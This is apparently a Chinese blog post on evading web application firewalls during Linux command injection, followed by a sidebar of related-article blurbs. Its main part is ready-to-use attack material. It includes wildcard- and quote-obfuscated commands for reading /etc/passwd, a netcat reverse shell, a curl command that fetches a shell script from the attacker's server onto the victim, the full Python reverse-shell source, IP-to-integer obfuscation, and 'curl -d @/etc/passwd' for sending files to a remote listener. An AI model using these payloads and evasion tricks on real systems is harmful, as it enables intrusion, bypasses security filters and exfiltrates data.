Linux环境下命令注入————WAF绕过技巧

最新推荐文章于 2024-09-12 00:57:07 发布
最新推荐文章于 2024-09-12 00:57:07 发布
阅读量5.6k 收藏 8
点赞数
分类专栏: 【渗透测试高级篇】 # WAF

命令注入之Web应用防火墙绕过技巧

本文中讲述的绕过防火墙技巧,只适用于linux系统命令注入环境中,大家就不要纠结于这些绕过技巧不适用于mysql、window什么的。

使用通配符绕过防火墙规则

例如使用 /???/c?t /?t?/p??swd 来代替 cat /etc/passwd

/???/c?t /?t?/p??swd 其实匹配到的是 /bash/cat /etc/passwd

有时候我们想用netcat在目标机器上反弹一个端口,那么可以如下操作:

/???/n? -e /???/b??h 127.0.0.1 6666
# /bin/nc -e /bin/bash 127.0.0.1 6666
# -e 后面跟上你要执行的程序,在连接成功后会自动运行该程序

当然,你还可以使用*星号、[0-9]字符集等匹配符来获取相关信息,有关标准通配符的更多信息可以在终端中键入 命令man 7 glob,按照手册进行学习。

使用字符串拼接绕过防火墙规则

连接字符串的操作符主要有以下几种

在python、Java中使用 + 号;在PHP、perl中使用 . 号;在lua语言中则使用 .. 符号来连接字符串。而这些编程语言中的一些字符串连接符,有时候在bash中也可以达到字符连接的效果,这就导致我们可以绕过一些Web应用防火墙规则(例如基于关键词匹配的防火墙规则)。

root@kali:~# echo Mochazz
Mochazz
root@kali:~# echo Mo'''chazz'
Mochazz
root@kali:~# echo 'Mo''chazz'
Mochazz
root@kali:~# echo 'M'och'az'z
Mochazz

看一条pm匹配规则(防火墙规则)

# Detect suspicious client by looking at the user agent identification 
SecRule REQUEST_HEADERS:User-Agent "@pm passwd shadow" "id:166"

这条规则将忽略大小写进行匹配,如果匹配中passwd或shadow词组,即进行阻断,但是如果我们使用字符串拼接,则可以绕过改规则

root@kali:~# /'b'i''n/'c''a't /e't'c/p''as''sw'd'

使用以下命令在受害机上下载用于反弹shell的脚本

curl -v "http://VPS的IP/shell.py" -o /tmp/shell.py

shell.py 代码如下

#!/usr/bin/python
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("<my ip address>",2375))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])

提前在你的VPS上用nc侦听一个端口

nc -lvp [port]

更进一步,我们可以将点分十进制的IP转换成长整数IP,例如

curl -v "http://127.0.0.1/shell.py" -o /tmp/shell.py
curl -v "http://2130706433/shell.py" -o /tmp/shell.py

使用 \ 符号来绕过WAF

root@kali:~# c\a\t /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin

使用 \ 符号加回车来绕过WAF

root@kali:~# c\
> at /e't'c/p''a's'swd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync

使用curl -d参数读取本地文件

curl -d @/<file> <remote server>
例如
curl -d @/etc/passwd 127.0.0.1:8888
# 在本地侦听8888端口即可接受到数据

关于文中更详细的内容,大家可以参考下面两篇文章。
PS:刚好这两天在看这两篇文章,freebuf小编在昨天翻译了其中一篇,大家也可以看WAF绕过技巧浅谈

Web Application Firewall (WAF) Evasion Techniques

Web Application Firewall (WAF) Evasion Techniques #2

FLy_鹏程万里
关注
专栏目录
【网络安全---Linux命令绕过Linux命令执行绕过技巧(很全,很实用)
m0_67844671的博客
09-24 3289
Linux命令执行绕过方式和思路;网站上可能有一些能执行系统命令的地方,但是对一些关键字和空格等做了一些防护,如何绕过就成了一个难题,这篇文章分享一些Linux下的命令执行绕过技巧以及思路,不如说空格的绕过,关键字绕过,编码绕过等等;
linux命令绕过
qq_46229380的博客
12-18 772
linux命令绕过总结
雷池 WAF 的详细安装与配置指南
最新发布
qq_60548077的博客
09-12 546
雷池 SafeLine 是一款高效的 Web 应用防火墙 (WAF),通过阻止恶意流量,保护网站免受常见的安全威胁。以下教程将为你详细讲解如何在 Linux 环境下安装和配置雷池,并开始保护你的 Web 应用。
命令注入绕过技巧总结
weixin_41082546的博客
05-05 3512
命令注入绕过技巧总结 命令注入是一个安全漏洞,它使攻击者可以在易受攻击的应用程序中执行任意命令。 基本命令 root@micr067:~# cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin...
linux命令 waf,命令执行WAF绕过技巧总结
weixin_33724264的博客
05-09 554
原标题:命令执行WAF绕过技巧总结*本文作者:zusheng,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。前言如今市面上的WAF几乎都已经具备了针对RCE攻击的防御能力,这些WAF并不是想象中毫无破绽,当Web服务器是Linux平台时我们就可以利用一些技巧绕过WAF规则集。本文主要总结Linux平台下针对RCE WAF绕过技巧,Windows平台不在本文考虑范围内。0×01 技巧一...
命令注入
Vinson的博客
10-04 292
靶机106攻击机109 这个不能被骗了拉,要查看源代码,不是真的什么都没有! secure目录下载的backup需要密码 看到是mp3文件,不一定真的是mp3文件 file查看发现是文本文件,用cat 给出网址,用户名 利用挖掘到的用户名和密码登陆系统,对系统是否使用某种CMS,SMS等进行查看 利用EXP渗透 searchsploit 系统 searc...
WEB安全番外第五篇--关于使用通配符进行OS命令注入WAF
weixin_30256901的博客
02-12 276
一、通配符简介: 一般来讲,通配符包含*和?,都是英文符号,*用来匹配任意个任意字符,?用来匹配一个任意字符。 举个例子使用通配符查看文件,可以很名下看到打卡的文件是/etc/resolv.conf: 1 └─[$]> sudo head -5 /???/r????v.c??f 2 # 3 # macOS Notice 4 # 5 # This file is not co...
SQL注入WAF绕过策略
qq_40710190的博客
10-24 369
SQL注入WAF绕过策略 为了防止sql注入的安全问题,安全过滤应运而生。在php中的一个string匹配的函数preg_match便是如此。 先来PHP manual看看preg_match是什么吧 preg_match 说到preg_match就不得不提到正则表达式,JS中的正则表达式或者自行上网学习。然后提供一个在线的正则匹配网站还是非常不错的https://regex101.com/ ok接下来进入讲解, 1.架构层绕过WAF 寻找源站——>针对云WAFWAF是假设非嵌入式的,所有访问
Kali linux 学习笔记(五十一)Web渗透——sqlmap自动注入 2020.3.28
闵行小鱼塘
03-28 3262
学习sqlmap自动注入
Kali Linux渗透测试之SQLmap自动注入(二)——Request
橘子女侠
07-18 1434
SQLmap自动注入(二)——Request Request: These options can be used to specify how to connect to the target URL --method=METHOD Force usage of given HTTP method (e.g. PUT) --data=DATA ...
深入了解SQL注入绕过waf和过滤机制
05-04
知己知彼百战不殆 --孙子兵法 [目录] 0x00 前言 0x01 WAF的常见特征 0x02 绕过WAF的方法 0x03 SQLi Filter的实现及Evasion 0x04 延伸及测试向量示例 0x05 本文小结 0x06 参考资料
渗透测试笔记——收集于网络
08-05
此外,还包括了Linux系统下绕过disable_function的技巧、Redis未授权访问的利用方法等。 内网攻击与横向移动 渗透测试笔记中提到了如何对内网进行攻击和横向移动的技巧。这包括了内网主机探测、端口扫描、反弹shell...
Oracle学习总结(6)—— SQL注入技术
科技D人生
09-23 3013
不管用什么语言编写的Web应用,它们都用一个共同点,具有交互性并且多数是数据库驱动。在网络中,数据库驱动的Web应用随处可见,由此而存在的SQL注入是影响企业运营且最具破坏性的漏洞之一。 SQL注入基本介绍 结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。1986年10月,美国国家标准学会对SQL进行
kali Linux 使用Metasploit爆破Tomcat密码
2201_75509440的博客
06-30 671
Apache tomcat是世界上使用最广泛的java web应用服务器之一,绝大多数人都会使用tomcat的默认配置。默认配置中会有一个向外网开放的web应用管理器,管理员可以利用它在服务器中启动、停止、添加和删除应用。在本节中,将使用metasploit某个模块对tomcat管理界面实施密码暴力破解攻击以获得一个管理器的访问权限Apache Tomcat,通常简称为Tomcat,是一个开源的Java Servlet容器,也是一个用于在Java环境下运行Web应用程序的Web服务器。
kali linux ssh不要密码登录密码,kali linux 登录ssh服务常见问题
weixin_39999730的博客
05-12 681
kali linux 登录ssh服务常见问题kali linux 登录ssh服务常见问题kali linux 登录ssh服务常见问题一、ssh简介1、层次2、ssh解决问题二、服务器发送了一个意外的数据包三、ssh服务器拒绝了密码一、ssh简介??SSH 为Secure Shell的缩写,由IETF的网络小组(Network working Group)所制定,SSH为建立在应用层基础上的安全协议...
Kali 渗透Linux工具以及命令详细步骤
qq_52160611的博客
09-10 1193
这只是Kali Linux上一些常用的渗透工具和相应的基本命令示例。请注意,渗透测试和漏洞分析是合法的,但只能在授权的环境中进行,否则可能涉及法律问题。在进行渗透测试之前,确保您已经取得了适当的授权,并且仅针对您有权限测试的系统执行操作。同时,请遵守所有法律和道德准则。Netcat是一个网络工具,可用于创建反向或正向连接,进行端口扫描等。
Linux各操作系统绕过开机密码
qq_43678263的博客
03-31 4883
文章目录UbuntuCentOSKali 各版本都亲测成功 Ubuntu 1、进入单用户模式:选择系统界面按e 2、将ro改为rw single init=/bin/bash 3、ctrl + x 4、passwd修改为自己的密码 CentOS 1、进入单用户模式:选择系统界面按e 2、CentOS:ro改为rw init=/bin/sh 3、ctrl + x 4、passwd修改为自己的密码 Kali 1、进入单用户模式:选择系统界面按e 2、Kali:ro改为rw 在尾部追加 init=/bin/..
命令注入突破长度限制
qq115399231的博客
07-14 1360
命令注入突破长度限制 碰见了不少像这样的题 原型来自 HITCON CTF 2017 的 BabyFirst Revenge <?php $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']); @mkdir($sandbox); @chdir($sandbox); if (i...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值